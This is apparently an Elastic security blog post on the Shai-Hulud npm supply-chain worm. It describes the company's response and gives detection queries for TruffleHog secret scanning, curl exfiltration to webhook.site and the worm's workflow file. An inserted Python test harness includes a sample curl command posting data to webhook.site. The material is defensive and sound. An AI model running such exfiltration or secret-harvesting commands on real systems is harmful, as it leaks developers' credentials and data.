
Compromised Node Package Manager (npm) packages and the subsequent identification of the Shai-Hulud worm have the software development community in response mode. Elastic understands the critical importance of maintaining the integrity of our software supply chain; while Elastic products are not shipped with npm, our software uses npm to retrieve packages from the npmjs[.]com registry during the build process. 

In this blog, we will walk through the steps Elastic has taken to analyze our code base and how we mitigate threats posed by these compromised packages as well as our prevention and detection rules, hunt queries, and recommendations. 

Understanding the threat: The npm compromise and Shai-Hulud

npm is one of the largest software registries for JavaScript (JS). In September, malicious updates were detected in at least 40 npm packages, including the popular @ctrl/tinycolor package.

Certain npm packages were infected with self-replicating malware known as the "Shai-Hulud" worm. After compromising an npm developer account and enumerating other packages maintained by that developer, the worm publishes modified versions that include the worm's code. This propagation cycle repeats continuously as new developer accounts are compromised.

Elastic's response

At this time, Elastic has found no evidence of compromise within Elastic’s software environment. 

Elastic Information Security team initiated an immediate investigation to:

  • Audit dependencies: Elastic continuously scans our products using software composition analysis (SCA) tooling which allowed us to quickly audit our codebase and dependencies to identify any known malicious npm packages. 

  • Disable Elastic npm JavaScript repository updates: We removed the ability for new packages to be published to the Elastic npm JS repository and have audited packages published during the known exposure window.

  • Disable dependencies auto-updating: As a precaution, we have temporarily disabled auto-updating JavaScript dependencies to newer versions for the continuous builds in our CI/CD infrastructure.

  • Implement endpoint scanning: Using the OSQuery integration for Elastic Agent, we implemented continuous scanning for the known compromised npm packages installed on Elastic laptops.  

  • Run out-of-the-box (OOTB) detection rules: Elastic Security Labs already provides OOTB Elastic Security detection rules to aid in identifying systems that have installed and are running a compromised package. We’ve included more details on the protections listed below that you can leverage for your own threat hunting.

  • Notify Elastic developers: Advisories were sent to Elastic developers, notifying them of the ongoing investigation and prohibiting the update or installation of new npm packages.

Hunting queries

We recommend Elastic Security customers hunt for potential compromises in their own environments. The following ES|QL queries can be used to identify behaviors associated with this supply chain compromise.

Note: Hunting queries can identify potential compromises but still require analysis and investigation to determine a true positive.

TruffleHog

Execution of TruffleHog, software developed to discover secrets, with known arguments:

FROM logs-*
| WHERE event.type == "start"
  AND (process.name == "trufflehog.exe" OR process.name == "trufflehog")
  AND process.args : "--results=verified"
  AND process.args : "--json"
  AND process.args : "filesystem"

If you are collecting audit logs using any Elastic Agent SaaS integrations, such as GitHub, Slack, AWS, GCP, and Azure, you can create a detection rule alerting on the TruffleHog user agent being observed within the data.

FROM logs-*
| WHERE user_agent.original == "TruffleHog"

cURL exfiltrating data

Identify cURL being used to exfiltrate data from a compromised host to the known malicious web server.

FROM logs-*
| WHERE event.type == "start"
  AND process.name IN ("curl", "curl.exe")
  AND (process.command_line LIKE "*webhook.site*" OR process.command_line LIKE "*shai-hulud*")
  AND process.args : "-d"

Worm YML file creation

Identify the creation of the GitHub Actions workflow file, shai-hulud-workflow.yml.

FROM logs-*
| WHERE event.type == "creation"
  AND file.name == "shai-hulud-workflow.yml"

jq parsing the repository file

Identify if jq is being used to discover the authenticated usernames (.login) and the default GitHub branch commit SHA (.object.sha).

FROM logs-*
| WHERE event.type == "start"
  AND process.name == "jq"
  AND process.args : "-r"
  AND (process.args : ".object.sha" OR process.args : ".login")

Compromised packages

You can use OSQuery to identify known compromised packages. Configure an OSQuery pack to run on systems to continuously collect all installed npm packages:

SELECT * FROM npm_packages

The results from these OSQuery packs will be searchable in the logs-osquery_manager.result* index. You can search for any installed packages that are known to be infected as well as create detection rules for any of those packages.
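The hunts above, re-implemented as plain Python predicates and run over a handful of constructed ECS-style events, so the matching logic can be checked offline before it is turned into a rule (an added example, not Elastic's code; the events, the `webhook.site/example-id` URL and the helper names are constructed for illustration):

```python
"""The blog's ES|QL hunts as Python predicates over constructed ECS-style events."""

# Constructed sample events using ECS field names; not real telemetry.
EVENTS = [
    {"event.type": "start", "process.name": "trufflehog",
     "process.args": ["trufflehog", "filesystem", "/home", "--results=verified", "--json"]},
    {"event.type": "start", "process.name": "curl",
     "process.command_line": "curl -d @data.json https://webhook.site/example-id",
     "process.args": ["curl", "-d", "@data.json", "https://webhook.site/example-id"]},
    {"event.type": "creation", "file.name": "shai-hulud-workflow.yml"},
    {"event.type": "start", "process.name": "jq", "process.args": ["jq", "-r", ".login"]},
    {"event.type": "start", "process.name": "curl",  # benign download, should not match
     "process.command_line": "curl https://example.org",
     "process.args": ["curl", "https://example.org"]},
]

def args_contain(ev, *needles):
    """Mirror the ES|QL `process.args : "x"` term match on the multi-valued args field."""
    args = ev.get("process.args", [])
    return all(n in args for n in needles)

def is_trufflehog_run(ev):
    return (ev.get("event.type") == "start"
            and ev.get("process.name") in ("trufflehog", "trufflehog.exe")
            and args_contain(ev, "--results=verified", "--json", "filesystem"))

def is_curl_exfil(ev):
    cl = ev.get("process.command_line", "")
    return (ev.get("event.type") == "start"
            and ev.get("process.name") in ("curl", "curl.exe")
            and ("webhook.site" in cl or "shai-hulud" in cl)
            and args_contain(ev, "-d"))

def is_worm_workflow_file(ev):
    return ev.get("event.type") == "creation" and ev.get("file.name") == "shai-hulud-workflow.yml"

def is_jq_repo_parse(ev):
    return (ev.get("event.type") == "start" and ev.get("process.name") == "jq"
            and args_contain(ev, "-r")
            and (args_contain(ev, ".object.sha") or args_contain(ev, ".login")))

HUNTS = {"trufflehog": is_trufflehog_run, "curl_exfil": is_curl_exfil,
         "worm_workflow_file": is_worm_workflow_file, "jq_repo_parse": is_jq_repo_parse}

def run_hunts(events):
    """Return {hunt_name: number of matching events}; every hit still needs analyst review."""
    return {name: sum(1 for ev in events if pred(ev)) for name, pred in HUNTS.items()}

if __name__ == "__main__":
    print(run_hunts(EVENTS))  # each hunt matches exactly one of the constructed events
```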

OOTB Elastic Detections

The following out-of-the-box detection and prevention rules also provide coverage for the Shai-Hulud worm:

Commitment to security

Security is foundational to Elastic’s development lifecycle and operational processes. The npm compromise and the Shai-Hulud worm underscore the persistent and rapidly evolving nature of cyber threats to global software supply chains. We remain committed to:

  • Continuous monitoring: Maintaining 24/7 monitoring of our systems and networks for any signs of compromise.

  • Rapid response: Ensuring our security teams are prepared to respond swiftly and effectively to new threats.

  • Transparency: Communicating openly with our users and community about security incidents and our mitigation efforts.

We will continue to monitor new information, and as we learn more about this event, we will update this publication. For more information on how Elastic can help secure your environment, please visit our security solutions page.

The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.